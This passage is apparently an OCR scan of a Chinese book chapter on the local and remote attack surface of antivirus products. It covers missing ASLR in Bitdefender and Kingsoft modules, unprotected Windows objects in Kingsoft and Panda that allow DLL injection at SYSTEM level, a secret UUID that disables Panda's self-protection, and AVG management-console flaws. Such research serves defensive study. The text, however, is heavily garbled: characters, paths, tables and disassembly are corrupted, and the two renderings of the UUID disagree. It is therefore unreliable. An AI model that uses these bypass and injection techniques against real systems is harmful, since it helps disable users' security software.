写 稳定 的 漏洞 利用 程序 。 不 管 怎么 样 ， 即 使 进程 或 动态 链接 库 没 有 启用 ASLR， 我 们 也 不 能 确定 
程序 加 载 的 相关 地 址 就 是 我 们 第 一 次 使 用 进程 管理 需 或 其 他 工具 时 看 到 的 那个 。 启 用 ASLR 的 库 
的 加 载 地 址 可 能 会 和 我 们 想 要 用 于 漏洞 利用 程序 编写 的 库 加 载 的 基地 址 有 冲突 ,这 时 候 Windows 
系统 会 重 载 地 址 。 要 注意 的 是 ， 即 使 是 对 于 大 多 数 动态 链接 库 没 有 启用 ASLR 的 Bitdefender 而 言 ， 
系统 的 一 些 动态 链接 库 也 会 干扰 基地 址 ， 因 此 会 让 程序 具有 局 用 了 ASLR 的 类 似 行为 。 
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ashttpdsp.mdl Bitdefender HTTP Dispatcher Plugin Copyright © 1997:2011 Bi... C:\Program Fles\Bitdefender\Bitdefender\otengines_00040_003\ashttpdsp md 2136. 
ashttpph mdi Bitdefender AntiPhishing Plugin Copyright © 1837-2011 Bit.. C:\Program FilesVBitdefender Bitdefendervotengines. 00040 003Vashttpph md 2136 
ashitprblmdi Bitdefender HTTP RBL Plugin Copyright © 1997-2011 Bit.. C:\Program FilesVBitdelendeBitdefendervotengines. 00040 003VashitpibLmdl 2136. 
astegex di BitDefender Antispam Regular Esp... BitDefender S.A.L C:\Program Files\BidefendervBitdefendervolengines_00040_003vastegex dl 1626 
prolapi di User Profile Basic API Microsoft Corporation. CMWindows\System32\profapi dl ASLR 61.7 
strdecoder di Sting Decoder Bitdefender C:\Program Files*Bitdefender\Bitdefenderistidecoder. dl ASLA 17. 到 
|watchdog di Bitdefender WatchDog Bitdefender C:\Program Files Bildefender BildelenderVwetchdog di Am — —17: 
log di BitDefender Loger Bitdefender CAProgiam Files\BitdefendertBitdefender\log dl ASLA 1.0.30. 
[CPU Usage: 100.00% [Commit Charge: 18.36% Processes: 44 Physical Usage: 36.54% | 








图 10-1 Bitdefender Security Service 几 乎 所 有 的 库 文件 以 及 相关 可 执行 程序 都 没有 启 
ASLR 


要 找 出 哪些 动态 链接 库 不 会 冲突 , 我 们 需要 重启 多 次 ,记录 下 对 应 库 的 地 址 ,并 在 重启 的 过 
程 中 确认 这 些 库 的 基地 址 在 重启 以 后 仍 会 保持 稳定 。 在 Bitdefender Security Service 的 案例 中 ， 我 
们 不 需要 进行 上 述 操作 ， 因 为 主 进 程 vsservexe 没 有 启用 ASLR， 同 时 可 执行 程序 会 优 于 其 他 任何 
库 之 前 加 载 。 由 于 Bitdefender 开 发 者 的 玻 忽 造 成 的 缺陷 ， 我 们 可 以 安全 绕 过 ASLR 。 

更 令 人 担忧 的 漏洞 是 ， 反 病毒 程序 在 实现 启发 式 引擎 或 “系统 主动 防护 ”( 反 病 毒 厂 商 一 般 
是 这 么 推广 的 ) 的 过 程 中 ， 向 所 有 进程 注入 的 动态 链接 库 (DLL ) 没有 启用 ASLR。 由 于 要 实现 
系统 主动 防护 ， 动 态 链接 库 会 注 和 人 到 所 有 进程 中 ， 这 会 导致 系统 中 所 有 进程 都 禁用 了 ASLR。 
个 案例 是 ， 在 中 国 和 日 本 有 着 很 大 装机 量 的 中 国 反 病 毒 软件 金山 互联 网 安全 套装 〈Kingsoft 
Internet Security，KIS )， 通 过 向 所 有 用 户 进程 注入 多 个 DLL 来 实现 应 用 层 防火 墙 。 但 是 这 些 动态 
链接 库 没 有 启用 ASLR ， 导 致 攻击 者 可 以 在 装 有 金山 互联 网 安全 套装 的 用 户 电 脑 上 轻松 执行 漏洞 
利用 程序 。 

如 图 10-2 所 示 ， 所 有 用 户 进程 ， 比 如 Firefox 浏 览 器 进程 ， 被 注入 了 没有 ASLR 保 护 的 库 。 如 
果 攻 击 者 没有 ASLR 绕 过 的 漏洞 , ee 攻击， 因为 金山 互联 
网 安全 套装 注入 了 没有 启用 ASLR 的 动态 链接 库 ， 攻 击 者 可 以 针对 在 日 本 和 中 国 装 有 金山 互联 网 
安全 套装 的 用 户 电脑 ， 编 写 稳定 的 漏洞 利用 攻击 程序 。 不 幸 的 是 , 这 款 反 病毒 软件 出 现 的 问题 在 
其 他 很 多 反 病 毒 产 品 中 同样 存在 ， 其 中 部 分 细节 将 会 在 10.3.7 节 讨论 。 
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国 tetay ere 267 116176K 24512K 27603588 Kingsoft Corporation. High. DEP 
knbcenter.ese. 002 12424K 14.024K — 1436 BIE EANA EE ERA.. Kingsoft Corporation System DEP (permanent) 
spoolsv.exe 4552K 8368K 1884 Spooler SubSystem App Microsoft Corporation System DEP (permanent) ASLA 
vchostere <00 9264K 10720K 1912 Host Process for Windows S... Microsoft Corporation System DEP (permanent) ASLA 
svchost ere 3496K 6.808K 2024 Host Process for Windows S... Microsoft Corporation System DEP (permanent) ASLA 
vchostere 30544K  26184K 1824 Host Process for Windows S... Microsoft Corporation. System DEP (permanent) ASLA 
taskhost ere 3284K 7.500K 2232 Host Process for Windows T... Microsoft Corporation Medium DEP (permanent) ASLA Vituaized 
Searchinderer.ese 007  16678K 12720K 3076 Microsoft Windows Search l... Microsoft Corporation System DEP (permanent)  ASLR 
jearchProtocolHost exe <00 7.392 K 12382K 3240 Microsoft Windows Search P... Microsoft Corporation System DEP (permanent) 。 ASLR 
earchProtocolHost ere <00 1388K 4160K 3116 Microsoft Windows Search P... Microsoft Corporation Medium DEP {permanen} ASLA Vitualized 
'earchFilerHosL exe 1560K 4388K 3160 Microsoft Windows Search F... Microsoft Corporation Medium DEP [permanent] ASLA 
psvc.ese 2136K 7.284K 1840 Microsoft Software Protectio... Microsoft Corporation. System DEP (permanent) ASLA 




































s UlDDetecLexe 1.752K 5344K 3124 Interactive services detection Microsoft Corporation System DEP (permanent) ASLA 
leass.exe 003 2748K 7592K 500 Local Security Authority Proc... Microsoft Corporation System DEP (pemanen) ASLA 
lsm.exe. 1.656K 4160K 508 Local Session Manager Serv... Microsoft Corporation System DEP (permanent) ASLA 
围 csrssexe 007 1468K 11136K 408 Client Server Runtime Process. Microsoft Corporation. System DEP (permanent) ASLA 
n winlogon.exe 1.748K 5376K 448 Windows Logon Application Microsoft Corporation System DEP (permanent) ^ ASLR 
E a eplorer.ese. 0.03 32.620K 47.608K 2382 Windows Explorer Microsoft Corporation. Medium. DEP [permanent] ASLA 
S% VBorTray ese. n0 1328K 4Q95K 2656 VirtualBox Guest Additions Tr... Oracle Corporation Medium DEP Vitualzed 
国 uschedexe 808K 3195K 2664 Java(TM) Update Scheduler Oracle Corporation Medum DEP (permaneni) 
3i procexp exe 588 1280K 18816K 600 SysniemalsProcessExplore! Sysintemals - wwwsysitet.. High DEP [permanent] ASLA 
@ fietoxese. 0.02 109048K. 112092K 2228 Firefox Mozilla Corporation. Medium. DEP (permanent) —ASLR 
Name Desciiplion Company Name. Pah ASLR ~ Version. 
healthreport.salite-shm CAUsersNoxeanVAppD ata\Roaming\Mozilla\Firefox\Profiles\gv7w1 p&e. defaulthealthreport. sqlite-shm na 
tartupCache.4. little. CAUsersNoxeanVAppD ata\Local\Mozila\Firefox\Profiles\gy7w1pBe, defaulfNstartupCache'startupCache.4.litle na 
kwsui dll Kingsoft Webshield Module. Kingsoft Corporation CAProgram Files\Kingsoft\kingsoft antivirusVkwsui.dll 2013.12.30 
kswebshield. dl Kingsoft Corporation. cC AProgram Files\Kingsoft\kingsoft TM dll 





Kingsoft Webshield Module. 






Mozilla Foundation CAProgram Files\Mozilla ET dii 


图 10-2 ”三 个 没有 启用 ASLR 的 库 文 件 ， 被 注入 到 了 Firefox 浏 览 右 的 内 存 空间 中 








10.2.3 ”利用 Windows 对 象 的 错误 权限 


在 Windows 操 作 系 统 中 ， 针 对 反 病 毒 软件 的 本 地 攻击 包括 滥用 错误 的 权限 、ACL 和 其 他 可 以 
被 分 配 ACL 的 Windows 对 象 。 

我 们 使 用 Sysinternals Suite 里 的 WinObj ( winobj .exe ) 来 检查 权限 和 已 建立 的 ACL。 要 检查 所 
有 对 象 的 权限 ， 我 们 需要 以 管理 员 身 份 运行 该 工具 。WinObj 运 行 以 后 ， 我 们 可 以 检查 目录 
\BaseNamedObjects 中 的 所 有 对 象 种 类 ,以 及 各 个 对 象 分 配 的 权限 。 人 如 果 我 们 要 研究 金山 毒 
霸 ， 需 要 搜索 文件 名 以 字母 k 开 头 的 Windows 文 件 对 象 图 10-3 显 示 了 这 样 的 一 个 对 象 : 名 为 
kws down files scan some guid. 如 果 我 们 双击 该 内 核对 象 , 会 显示 有 两 个 标签 的 对 话 框 。 Details 
标签 中 显示 了 该 Windows 对 象 的 基本 信息 ,比如 引用 句柄 的 数目 和 打开 的 句柄 数 等 。Security 标 签 
则 显示 了 该 对 象 的 特定 权限 。 


















































US cd 

Bilkws down files scan B3525A34 EB2D 44a7 9240 24B 

a - Event 

4 Beais Socuiy Event 

/3 Group or user names: Event 

8. hs permissions have been assigned for this object. Mutant 

á Event 

A — [Waring this is a potential security risk because anyone who can access Event 

A [bis obiect can take ownership ofit The object's owner should assign or 

permissions as soon as 

& Job 

a Event 

a Event 

å Add. Remove Event 

a am Event 

A Pemissions Alow — Den BE 

& Read H H ALPC Port 

a Wiite 国 口 Event 

a Delete B o Event 

f| Execue o H Mutant 

W | Synchorize H H Section 

a Section 

(4 Forspecialpemissions or advanced settings, click Adae Event 

jj Advanced, PER 

区 SymbolicLink 

Â Event 

a Event 
Event 

AÀ KxetrayStatusNotify{287581 14-8E0E-47f8-9F68-47F2C0769C8F} Event 

Aà kxescore(C5C4051D-B389-4e99-9145-28A593588889) Event 

Â kxecolct. bsod Event 

A kis, down, files. scan. B3525A34. EB2D. 447. 924C, 24804C669282 Event 

` L. B 
图 10-3 ”KIS 事 件 对 象 没 有 设置 ACL，WinObj 提 示 任 何人 都 可 以 控制 KIS 事 件 对 象 

















152 第 10 章 确定 攻击 面 





WinObj 警 告 该 事件 对 象 没 有 被 分 配 权限 控制 , 任何 人 都 可 以 操作 该 Windows 对 象 。 警告 信息 
如 下 。 





该 对 象 没有 添加 任何 权限 设置 。 
警告 : 这 是 一 个 潜在 的 安全 风险 ,因为 此 对 象 可 以 被 任意 可 接触 的 用 户 控 
制 。 对 象 的 所 有 人 必须 尽快 为 其 分 配 权限 设置 。 


相 较 于 上 面 ASLR 和 DEP 的 相关 案例 ，Windows 对 象 文件 没有 被 分 配 权 限 控 制 并 不 意味 着 反 
病毒 产品 中 存在 漏洞 。 但 是 , 该 模块 给 反 病 毒 产 品 和 该 产品 的 其 他 模块 带 来 问题 的 可 能 性 非常 大 。 
比如 ,如果 我 们 编写 一 个 程序 ,控制 该 事件 对 象 文件 ,然后 禁止 所 有 用 户 访 问 该 对 象 会 发 生 什么 ? 
其 他 进程 会 无 法 打开 该 事件 对 象 , 因此 也 就 无 法 通过 这 种 方式 来 发 出 提示 通知 。 另 一 种 办 法 是 向 
该 事件 对 象 连续 发 送信 息 。 由 于 尽管 发 送 了 信息 但 真实 情况 是 系统 中 没有 事件 发 生 , 这 种 办 法 可 
能 会 造成 反 病 毒 软 件 的 拒绝 服务 。 此 外 还 可 以 编写 一 个 连续 不 断 地 重 置 事件 对 象 状 态 的 程序 , 这 
样 等 待 事件 信息 的 相关 进程 就 无 法 收 到 通知 了 。( 我 们 可 以 在 事件 对 象 被 通知 后 、 事 件 对 象 的 监 
测 需 收 到 之 前 重 置 事件 对 象 。) 

当 我 们 在 审计 Windows 应 用 的 时 候 ， 时 间 和 互 斥 对 象 或 许 是 最 没意思 的 Windows 对 象 了 。 这 
里 的 “有 意思 ” 指 的 是 相关 对 象 可 以 轻松 地 用 于 权限 提升 。 最 好 的 例子 是 ， 一 个 线程 对 象 或 进程 
对 象 没有 被 分 配 ACL。 尽 管 这 是 一 个 相对 少见 的 问题 ， 却 对 不 少 反 病毒 软件 造成 了 困扰 ， 比 如 
Panda Global Protection 2014 版 之 前 的 版 本 。 这 里 以 Panda Global Protection 2012 版 本 为 例 。 和 之 前 
研究 金山 互联 网 安全 套装 的 案例 不 同 , 这 里 无 须 使 用 WinObj, 而 是 使 用 Sysinternals 套 装 中 的 进程 
管理 器 ， 后 者 更 适合 用 于 检查 用 户 态 线程 和 进程 对 象 。 安 装 完 Panda Global Protection 2012/5, $T 
开 进程 管理 器 ， 找 到 Panda 反 病毒 软件 的 进程 SrvLoad.exe ( 如 图 10-4 所 示 )。 
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For special permissions or advanced settings, 
click Advanced eel 


Learn about access control and permissions 














图 10-4 这 是 Panda 反 病毒 软件 以 SYSTEM 身 份 和 最 高 完整 性 级 别 运行 的 SrvLoad 进 程 没 
有 设置 任何 ACL 的 漏洞 证 明 截 图 。 该 漏洞 由 本 书 作 者 发 现 、 报 告 并 于 2014 年 被 
官方 修复 
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进程 管理 需 提 示 我 们 ,SrvLoad.exe 没 有 启用 ACL。 这 就 意味 着 该 对 象 文件 允许 本 地 用 户 控制 
该 应 用 ,并且 可 以 用 最 高 权限 (SYSTEM 用 户 身 份 ) 来 在 本 地 系统 中 运行 。 这 样 的 漏洞 其 实 并 不 
常见 , 因为 一 个 进程 或 线程 对 象 的 权限 通常 来 说 是 继承 自 父 对 象 的 , 而 软件 开发 者 必须 直接 调用 
函数 setsecurityDescriptorDAL， 才 能 向 其 分 配 一 个 NULL 值 的 ACL。 但 是 在 很 多 情况 下 , 程 
序 员 为 了 偷 颌 ,会 直接 使 用 当前 进程 打开 并 与 之 交互 。 不 幸 的 是 ,这 样 一 来 会 使 得 本 地 计算 机 上 
的 其 他 用 户 也 有 权限 做 相同 甚至 更 多 的 事情 ; 一 个 本 地 漏洞 利用 攻击 程序 可 以 打开 进程 并 通过 调 
用 createRemoteThread 注 人 一 个 DLL 文 件 ， 比 如 在 SrvLoad.exe 的 执行 环境 下 运行 代码 并 提升 
至 本 地 系统 权限 。 

在 查找 反 病 毒 软件 漏洞 过 程 中 ， 我们 还 需要 留意 的 Windows 对 象 是 Section。Section 对 象 是 可 
以 跨 进 程 分 享 的 内 存 区 块 , 用 于 在 不 同 进程 间 分 享 内 存 地 址 空间 , 也 可 以 用 于 将 一 个 文件 映射 到 
一 个 进程 的 内 存 空间 中 。 如 果 一 个 区 块 没有 设置 正确 的 权限 ( 正确 的 ACL ) 或 者 权限 设置 没有 禾 
盖 到 所 有 区 块 对 象 , 那么 所 有 用 户 都 可 以 读 取 到 区 块 对 象 中 的 信息 了 。 这 会 导致 用 户 的 密码 等 敏 
感 信息 泄漏 ， 也 会 导致 恶意 数据 被 写 和 人 贡献 区 块 中 ， 从 而 对 相关 反 病 毒 进 程 造成 干扰 。 

在 极 少数 案例 中 , 贡献 的 区 块 中 会 包含 可 执行 代码 一 一 可 以 被 一 个 进程 执行 并 被 另 一 个 进程 
读 取 写 入 的 二 进 制 代码 片段 。 如 果 没 有 设置 ACL 或 者 权限 控制 设置 错误 的 话 , 结果 将 会 是 致命 的 ， 
任何 用 户 都 可 以 向 贡献 区 块 中 写 人 可 执行 的 代码 , 这 就 导致 攻击 者 可 以 利用 这 一 缺陷 , 向 共享 的 
区 块 中 写 和 人 可 执行 代码 ,接着 让 进程 (很 可 能 是 以 SYSTEM 身 份 运行 的 ) 执行 该 代码 片段 。 这 样 
的 漏洞 案例 很 少 看 到 ， 实 际 上 却 在 很 多 反 病 毒 产 品 中 都 有 潜藏 。 


10.24 利用 逻辑 缺陷 


逻辑 缺陷 又 被 称 为 业务 逻辑 漏洞 , 会 对 进程 的 逻辑 造成 影响 。 这 类 漏洞 不 能 通过 使 用 基础 的 
审计 工具 (比如 Process Explorer 或 WinObj ) 发 现 。 我 们 需要 使 用 道 向 分 析 软 件 ， 比 如 IDA 来 反 汇 
并 检查 目标 反 病 毒 产品 模块 背后 的 真实 代码 逻辑 来 发 现 逻 辑 缺 陷 。 

在 Panda Global Protection 2011~2013 版 本 中 就 存在 一 个 逻辑 问题 , Panda 反 病毒 的 所 有 进程 被 
一 个 名 为 Panda's Shield 的 自我 防护 功能 保护 。Panda”s Shield 用 于 阻止 任何 本 地 进程 结束 Panda 的 
分 析 和 系统 服务 ， 或 者 为 其 注入 Shellcode。 但 是 由 于 某 些 原因 ，Panda 反 病毒 的 开发 者 在 该 功能 
中 内 置 了 可 以 启用 或 禁用 自我 防护 的 后 门 。 动 态 链接 库 pavshdl.dll 导 出 一 系列 函数 ， 除 了 
PAVSHLD_001 和 PAVSHLD_002 外 ， 其 他 函数 都 是 肉眼 可 读 的 ( 见 图 10-5 )。 
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Address Ordinal 
HLD_0001 1 
PAVSHLD 0002 SDA263B0 2 
PAVSHLD  AddExemptProcessByPath 3DA27590 3 
PAVSHLD Finalize 3DA277A0 4 
PAVSHLD. GetInfo 3DA27FE0 5 
PAVSHLD  Initialize 3DA260E0 6 
PAVSHLD. Install 3DA2F300 7 
PAVSHLD IsInstalled 3DA25200 8 
PAVSHLD. IsRegistered 3DA25320 9 
PAVSHLD RemoveExemptProcessByPath 3DA27660 10 
PAVSHLD. SetExempted 3DA27BEO 1 
PAVSHLD. SetNotificationCallback. 3DA27150 12 
PAVSHLD. Uninstall 3DA2D670 13 
PAVSHLD Upgrade 3DA2F660 14 
PSFRP AddProtection 3DA29960 15 
PSFRP RemoveProtection 3DA265CO0 16 
=| DilEntryPoint 3DA405CE 
图 10-5 ” 库 文件 pavshdl.dll 导 出 的 函数 列表 


mor 动态 链接 库 导 出 的 函数 大 多 都 是 肉眼 可 读 的 函数 名 称 的 话 , 通常 意味 着 开发 者 可 能 
想 要 隐藏 背后 的 真实 逻辑 。 首 先 在 IDA 中 打开 第 一 个 函数 PAVSHLD_001, 会 看 到 图 10-6 中 显示 的 


结果 。 





-text:3D826388 ; int _ cdecl PAUSHLD 88@1(RPC_STATUS Status) 








-text :3D826308 public PRUSHLD 8881 
-text:3D826388 PAUSHLD 6001 proc near ; DATA XREF: .rdata:off 3DA5381840 
text:3D826388 
tex DA26388 Uuidi = UUID ptr -28h 
tex D826388 Uuid = UUID ptr -16h 
tex DA26388 Status = dword ptr 4 
tex DR26388 
text:3D826308 mou eax, [esp*Status] 
tex DA26304 sub esp, 28h 
tex DA26387 test eax, eax 
text:3DA26389 jz short exit label 
-text :3D82638B mou ecx, [eax] 
-text :3D82638D mou edx, [eax*^] 
-text :3D826318 mou [esp*28h«Uuidi.Datai], ecx 
„text :3D026313 mou ecx, [eax+8] 
-text:3D826316 mou dword ptr [esp*28h«Uuidi.Data2], edx 
-text:3D826318R mou edx, [eax*BCh] 
-text:3DA2631D lea eax, [esp*28h«Uuid] ; The given UUID string pointer is stored in EAX 
-text :3D8026321 push eax ; Uuid 
-text:3D826322 push offset StringUuid ; "ae217538-195a-5178-9a8f-2686b95d9F13' 
-text:3D826327 mou dword ptr [esp*28h*Uuidi.Datah], ecx 
-text:3DA2632B mou dword ptr [esp*28h«Uuidi.Datal*h], edx 
.text:3D82632F call ds:ÜUuidFromStringR ; The "secret" UUID is the 1st argument to UuidFromStringh 
-text:3D826335 lea ecx, [esp*28h«Status] 
-text:3DA26339 push ecx ; Status 
-text:3D82633R lea edx, [esp*2hh«Uuid] 
push edx ; Uuid2 
lea eax, [esp*28h«Uuid1] 
push eax ; Uuid1 
call ds:UuidEqual 
test eax, eax 
jnz short disable shield logic ; Is the given UUID the "secret" one? 
exit label: ; CODE XREF: PAUSHLD 8881«91j 
xor eax, eax 
add esp, 28h 
-text:3D826353 retn 
:Et 
-text:3DA26354 
-text:3DA26354 disable shield logic: ; CODE XREF: PAUSHLD 8881*ACfj 
-text:3DA26354 call sub 3DfR35278 





0006321 [spazeszi: PAVSHLD 0001421 























图 10-6 ”图 中 的 秘密 UUID 可 以 用 于 禁用 Panda 反 病毒 的 自我 保护 





反 汇编 结果 显示 ，Panda Shield 可 以 通过 向 PAVSHLD_001 传 递 一 个 ae217538-194a-4178- 


9a8f-2606b9499f13 的 UUID“ 秘 密 ” 值 来 禁用 相关 防护 。 
值 ， 一 系列 可 写 的 注册 表 键 (任意 用 户 都 可 写 ) 被 更 新 ，Panda Shield 则 被 禁用 。 


可 以 使 用 另 一 个 办 法 挖掘 到 : 检查 Panda 反 病毒 的 相应 


UE 


E 





册 表 键 的 权限 控制 状态 。 


当 该 函数 接收 到 了 正确 的 UUID 参 数 
这 项 逻辑 漏洞 


10.3 ”理解 远程 攻击 面 155 





10.3 理解 远程 攻击 面 


远程 攻击 面 是 指 可 以 被 攻击 者 用 来 向 在 局 域 网 (LAN ) 或 在 广域网 ( WAN ) 中 的 反 病 毒 用 
户 开展 远程 攻击 的 攻击 面 。 
想 要 确定 日 标 反 病毒 软件 的 哪些 模块 容易 暴露 在 远程 攻击 之 下 , 我 们 需要 了 解 反 病 毒 软件 中 
哪些 模块 会 处 理 远 程 数 据 : 
a 文件 格式 解析 噩 ; 
口 通用 扫描 侦 测 程序 和 感染 文件 修复 代码 ; 
口 网 络 服务 、 管 理 面板 和 控制 台 ; 
口 DV side; 
a 防火 墙 、 入 侵 检测 系统 和 其 他 一 些 网 络 流量 分 析 模 块 ; 
口 更 新 服务 。 
反 病毒 产 品 会 尽量 在 每 个 入口 点 保护 用 户 免 受 远 程 恶意 攻击 。 结果 就 是 , 反 病毒 产品 在 尽 可 
能 多 地 部 署 额 外 的 防护 机 制 来 使 用 户 免 受 远 程 攻 击 侵 害 的 同时 ， 也 增加 了 数量 可 观 的 攻击 面 。 随 
着 反 病 毒 软件 在 服务 右 或 个 人 电脑 上 的 安装 ,新 的 攻击 方式 也 随 之 产生 。 比 如 ,引入 一 个 网 络 流 
量 包 过 滤 了 驱动 (用 于 入 侵 检测 ) 的 同时 ， 网 络 协 议 解 析 器 也 打开 了 一 个 新 的 攻击 面 。 
接 下 来 将 会 详 述 前 面 提 到 的 远程 攻击 面 。 


10.3.1 文件 解析 器 


文件 解析 器 是 反 病毒 产品 中 最 有 意思 的 研究 点 之 一 。 反 病毒 软件 的 设计 初衷 , 是 尽 可 能 多 地 
去 分 析 (扫描 ) 在 受 保护 的 机 器 上 创建 或 访问 的 所 有 文件 、 临 时 文件 和 其 他 文件 。 因 此 ， 反 病毒 
软件 会 扫描 浏览 器 下 载 的 所 有 文件 。 比 如, 如果 用 户 访问 的 网 站 提供 HTML 内 容 .CSS 和 JavaScript 
文件 , 反 病毒 软件 会 自动 扫描 所 有 相关 内 容 来 检查 站 点 是 否 带 有 恶意 内 容 。 在 自动 扫描 下 载 文件 
的 过 程 中 ， 可 能 会 触发 针对 字体 文件 、CSS 、JavaScript、OLE2 文 件 和 其 他 文件 格式 的 解析 器 中 
ie 利用 这 类 漏洞 ,攻击 者 可 以 远程 攻击 受 防 火 墙 保护 无 法 直接 访问 互联 网 的 用 户 个 人 电脑 。 
由 于 恶意 软件 将 浏览 器 作为 人 口 点 来 攻击 反 病 毒 软 件 , 用 户 个 人 电脑 变 得 十 分 容易 受到 攻击 。 在 
现实 世界 中 ， 有 很 多 针对 反 病 毒 软件 的 此 类 远程 攻击 。 

和 其 他 软件 厂商 一 样 , 现在 一 些 反 病毒 厂商 也 会 通过 走 安全 的 编程 开发 流程 进行 常规 源 代码 
安全 审计 , 来 降低 在 解析 文件 格式 过 程 中 出 现 漏 洞 的 可 能 性 。 正 因为 采取 了 额外 的 预防 措施 , 审 
计时 很 有 可 能 会 在 解析 复杂 文件 格式 的 源 代 码 逻 辑 中 发 现 漏 洞 。 这 些 复 杂文 件 格式 包括 : 
Microsoft OLE7 文 件 、 PDF, ELF, PE, MachO, Zip, 7z, LZH, RAR, GZIP, BZIP2, LNK, 
Adobe Flash, MOV, AVI, ASF, CLASS, DEX, 44, 

FEKE, 我 在 2014 年 对 19 款 反 病 毒 软 件 进 行 了 安全 漏洞 审计 , 结果 发 现在 解析 文件 格式 过 程 
中 出 现 漏洞 的 反 病毒 软件 有 14 款 。 这 是 一 个 相当 高 的 数字 。 在 我 看 来 ， 经 过 数 月 的 模糊 测试 ， 反 
病毒 软件 在 解析 特殊 文件 格式 时 也 不 会 朋 演 的 原因 可 能 是 : 反 病 毒 软 件 中 用 于 解析 不 同 格式 文件 
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的 模拟 器 或 虚拟 机 ， 是 使 用 类 似 解释 型 语言 或 托管 式 代 码 等 非 本 机 语言 编写 的 。Symantec 、 
Microsoft 和 Norton 等 反 病 毒 软件 都 使 用 了 这 些 方法 。 


10.3.2 ”通用 侦 测 和 感染 文件 修复 代码 


反 病 毒 软件 中 负责 通用 检测 和 感染 文件 的 代码 , 有 时 处 理 的 可 能 是 攻击 者 故意 构造 的 恶意 数 
据 。 与 简单 的 特征 匹配 不 同 ， 通用 侦 测 程序 需要 处 理 大 量 用 广 提供 的 传人 数据 。 比 如 ， 它 们 需要 
从 传人 文件 结果 被 解释 为 “大 小 ”的 参数 中 读 取 整 数 部 分 。 这 些 参数 会 被 用 于 之 后 解压 或 解密 被 
压缩 或 加 密 分 程序 过 程 中 的 分 配 或 复制 内 存 的 操作 。 

为 了 理解 这 一 概念 ,让 我 们 想象 有 一 个 感染 性 文件 感染 了 一 个 PE 可 执行 文件 并 加 密 了 原始 代 
码 区 块 。 当 反 病 毒 软件 扫描 到 了 类 似 被 感染 的 文件 , 反 病 毒 软件 的 通用 侦 测 代 码 在 判定 文件 被 感 
染 之 前 需要 收集 与 感染 有 关 的 证 据 信 息 。 侦 测 代码 需要 查找 原始 入 口 点 的 位 置 C original entry 
point, OEP )、 加 密 的 key 的 存储 位 置 ， 以 及 病毒 在 文件 中 的 存在 位 置 等 信息 。 感 染 修复 代码 会 使 
用 前 期 收集 的 信息 修复 被 感染 的 文件 , 将 文件 修复 到 原来 的 状态 。 从 文件 中 读 取 的 收集 信息 包括 ， 
文件 大 小 、 偏 移 量 和 攻击 者 控制 的 其 他 文件 区 域 。 如 果 修 复 程序 过 于 信任 所 收集 的 信息 ， 对 传人 
言 息 不 做 任何 安全 检查 的 话 ， 修 复 代 码 会 使 用 区 域 大 小 信息 执行 一 些 运算 ， 比 如 memcpy (会 导 
致 缓冲 区 溢出 ) 或 整数 算术 运算 (会 导致 整数 溢出 、 下 游 或 阶段 错误 )。 这 样 的 疏忽 给 感染 文件 
修复 模块 带 来 了 漏洞 。 类 似 地 ， 针 对 混淆 或 加 壳 的 病毒 [ 可 能 使 用 了 入 口 点 混淆 (entry point 
obscuring, EPO ) ], 通用 侦 测 程序 和 感染 文件 修复 程序 都 需要 处 理 许 多 新 的 文件 格式 和 不 受信 任 
的 数据 ， 而 这 也 会 产生 同 处 理 PDF 或 OLE2 文 件 格 式 解 析 器 一 样 的 安全 风险 。 


10.3.3 网络 服务 、 管 理 面板 和 控制 台 


反 病 毒 软件 连接 的 反 病 毒 管理 控制 台 和 对 应 的 客户 端 部 分 , 易 受 攻击 者 攻击 。 如 果 负 责 接收 

处 理 反 病毒 软件 的 桌面 客户 端 传递 的 信息 的 管理 控制 台 , 没有 对 所 接收 到 的 信息 进行 额外 检查 处 

理 ， 这 时 就 会 产生 漏洞 。 比 如 ,流行 的 反 病 毒 产 品 AVG 的 服务 器 模块 兽 经 有 一 系列 十 分 严重 的 缺 

陷 ( 有 一 部 分 已 经 修复 ， 但 是 大 部 分 还 没有 被 修复 )。 

O 缺失 验证 AVG 管 理 控制 台 的 登录 验证 是 在 客户 端 完成 的 。 因 此 ， 任 何 可 以 访问 该 台 机 

器 的 用 户 都 可 以 登录 到 管理 控制 台 。 从 安全 角度 来 看 ， 客 户 端 验证 即 代表 “已 登录 ”。 

O 缺少 实体 认证 ” AVG 的 通信 协议 对 通信 方 的 身份 没有 进行 验证 。 攻 击 者 可 以 伪装 成 AVG 

反 病 毒 终端 或 流氓 管理 服务 器 。 

口 静态 加 密 密 钥 和 不 安全 的 运行 模式 AVG 的 协议 使 用 Blowfish 作 为 加 密 密 码 。 但 对 应 的 密 
码 被 硬 编码 在 了 二 进 制 文件 中 ( 客户 端 和 服务 器 端 都 有 )， 所 以 任何 用 户 都 可 以 被 动 监听 
相关 通信 并 解密 通信 流量 。 此 外 ， 加 密 密 码 同样 被 用 在 了 记 住 密码 模块 中 ， 这 让 攻击 者 
可 以 窃取 并 解密 相关 加 密 的 密码 内 容 ( 也 称 作 明 文 密码 攻击 )。 

O 远程 代码 执行 ”客户 端 发 送 给 服务 器 端的 参数 之 一 是 clientLibraryName。 该 参数 代 
表 AVG 管 理 服务 器 可 以 加 载 的 DLL 文件 路 径 。 如 果 该 参数 指向 了 一 个 远程 路 径 (通用 命 
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名 约定 路 径 指 向 的 库 文件 )， 将 会 导致 管理 服务 器 加 载 远 程 文件 代码 并 以 SYSTEM 权 限 执 
行 恶 意 代码 。 这 是 一 个 十 分 严重 的 安全 漏洞 ， 且 利用 起 来 十 分 容易 。 
想 要 了 人 解 更 多 的 漏洞 细节 ， 可 以 参阅 SEC Consult Vulnerability Lab 发 布 的 安全 公告 : 
https:/www.sec-consult.com/fxdata/seccons/prod/temedia/advisories txt/20140508-0 AVG Remote - 
Administration Multiple critical vulnerabilities. v10.txt。 


同时 建议 大 家 关注 一 下 上 述 安 全 公告 中 的 处 理 时间 线 ， 它 有 点 让 人 奥 笑 不 得 。 
10.3.4 防火墙、 入 侵 监 测 系 统 和 解析 器 


目前 几乎 所 有 的 反 病 毒 软件 都 有 能 力 分 析 网 络 流量 ， 侦 测 被 下 载 的 恶意 程序 或 者 已 知 里 
感染 型 病毒 、 木 马 等 病毒 的 典型 网 络 跟踪 。 通 过 反 病 毒 软件 的 入 侵 防 护 系 统 ， 可 以 帮助 计算 机 用 
户 阻 断 病毒 的 恶意 攻击 。 该 系统 会 检查 计算 机 接收 到 的 所 有 流量 , 这 就 要 求 反 病毒 引擎 开发 代码 
来 解析 和 解码 网 络 流量 。 和 文件 格式 解析 模块 一 样 , 网 络 协议 解析 模块 中 的 漏洞 也 能 以 同样 的 方 
